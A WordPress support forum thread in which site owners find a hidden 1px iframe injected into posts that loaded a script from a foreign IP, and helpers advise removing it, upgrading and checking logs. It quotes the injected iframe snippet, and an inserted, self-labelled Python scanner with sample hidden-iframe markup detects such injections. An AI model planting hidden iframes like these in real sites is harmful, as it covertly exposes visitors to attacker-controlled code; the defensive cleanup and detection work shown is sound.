iframe injection problem?

  • Hi,

    I’ve searched around for a resolution to my problem but the closest thread I can find is this:

    Basically about a week ago my site began experiencing problems whenever I tried to access the home page > The screen just freezes for about 10 minutes..sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

    waiting for http://xx.xx.xx.xx./iframe/wp-stats.php

    (the ‘x’ is an IP address which I don’t recognise)

    At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)..I also tried other themes and browsers, but a week later and the problem still remains.

    So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

    “Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress — which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either WordPress itself or the theme you’re using (which has also been called into question as of late).”

    So now I’m wondering whether anyone can corroborate that this is the likely reason..and whether there is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself..or will it?

    Any advice would be much appreciated.

    PS I am using the CSS Freak theme.

Viewing 15 replies - 1 through 15 (of 89 total)
  • what is the xx.xx…

    and you say the problem persists, after removing the stats plugin? I don’t see the code on your site.

    Without seeing the xx.xx.xx.xx.. it’s hard to say much.

    that? that goes to China, that’s prolly not good.

    Thread Starter lostplay



    Yes, that’s the IP address..

    Yep, I removed the wp-stats plugin because I originally assumed it was at fault and because I wanted to ensure that I had covered the basics before asking for advice.

    Thanks for the feedback – do you (or anyone else) have any ideas on how to resolve this?

    It’s not on your single post pages .. have you looked inside your theme files? I would start there with looking at index.php

    Look inside THIS post:

    Moderator Samuel Wood (Otto)

    (@otto42) Admin

    Step 1: Find where the code is being inserted. From what whooami is saying, it’s likely inside the content of one specific post. So look through that post and find and remove it.

    Step 2: Upgrade to the current latest WordPress version (2.2.3). This has no known security issues at this time.

    Step 3: Keep up to date on WordPress releases. On the main dashboard, you’ll always see new release information. Also, in WordPress 2.3 and up, WordPress itself will start telling you when your version is out of date and give you info on how to upgrade. So that will be good.

    Given that the code is inside a post’s content, then I’d say yeah, they likely did it through the exploit in version 2.2. Upgrade to 2.2.3, right now.
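One way to carry out Step 1 across every post at once, as an added example that is not part of the original thread: a scanner that flags iframes sized to 1px or less, or hidden with CSS, in post bodies. It assumes the post content has already been exported as a mapping of post ID to HTML; the function names and sample posts are constructed for illustration.

```python
from html.parser import HTMLParser
import re


def _px(value):
    """Return the leading integer of a width/height attribute, or None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class HiddenIframeFinder(HTMLParser):
    """Collect the src of every iframe that is tiny or styled to be invisible."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser lower-cases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        w, h = _px(a.get("width")), _px(a.get("height"))
        style = a.get("style", "").replace(" ", "").lower()
        tiny = (w is not None and w <= 1) or (h is not None and h <= 1)
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            self.hits.append(a.get("src", ""))


def scan_posts(posts):
    """Map post ID -> list of suspicious iframe sources found in its content."""
    report = {}
    for post_id, content in posts.items():
        finder = HiddenIframeFinder()
        finder.feed(content)
        if finder.hits:
            report[post_id] = finder.hits
    return report


# Constructed sample data: post IDs and bodies are invented, and the address is
# from the 203.0.113.0/24 documentation range, not the one seen in this thread.
SAMPLE_POSTS = {
    101: "<p>Hello world</p>",
    102: "<p>News</p><!-- Traffic Statistics --><iframe src=http://203.0.113.7"
         "/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>",
    103: '<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>',
    104: '<IFRAME SRC="http://203.0.113.7/x" STYLE="display: none"></IFRAME>',
}
if __name__ == "__main__":
    print(scan_posts(SAMPLE_POSTS))
```

Legitimate embeds with normal dimensions (post 103 in the sample) are not reported, so every hit is worth opening in the post editor and removing by hand.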

    Thread Starter lostplay


    whooami – you’re a star! There was the following iframe inside that post:

    <!-- Traffic Statistics -->
    <iframe src= width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->

    So does this mean they were attempting to track my stats/traffic? Hmm..very nasty stuff. I have now removed it from that post.

    Otto42 – thank you for your help and advice also! I’m going to do as you advise and upgrade asap.

    Thanks again, I suspect that you have both saved me hours of stress!

    So does this mean they were attempting to track my stats/traffic?

    who knows, it would almost be interesting to make up a site that forges a referer that’s a wp blog and see if anything can be figured out. I really can’t see any way that they can glean anything worthwhile.

    Thread Starter lostplay


    Hmm, it’s a strange one indeed. Anyway thanks for the heads-up 🙂

    Happened today on 2.3.1 site. The injected code was:
    <!-- Traffic Statistics -->
    <iframe src= width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->

    Inside wp-stats.php is JavaScript code. Host is in China. When can we expect a patch?

    Yup. The same thing happened to me. Running 2.3. I thought it must’ve been exploit for 2.3. But it turns out 2.3.1 is also vulnerable. I am not feeling too comfortable with this actually. And I just noticed it in a post I did 2 days ago!! Now I gotta go back and dig them out… Argh…

    Happened to me too.

    Glad to find others discussing this. I’ve just noticed the same thing turning up in my blog, running v2.3. Was about to update to 2.3.1 but I see from comments on here that it is vulnerable as well.

    Any idea what hole these are crawling through?

    Dion Hulse


    Meta Developer

    Can anyone take a read through their webservers access logs and look for anything suspect accessing the admin pages?
    Also check for other users, and change the admin passwords.
    It is hard to work out what is happening here without knowing where the problem is coming from.

    Inserting an iframe of that style is the common injection by at least one black hat seo ring — I’ve heard of that injection http://xx.xx.xx.xx./iframe/wp-stats.php being on a Joomla! site.

    Columcille, it’s still advisable to upgrade to 2.3.1 as it does address security issues. Including what WP theme, plugins, and other s/w is running on your host will help isolate the vector of the exploit.

  • The topic ‘iframe injection problem?’ is closed to new replies.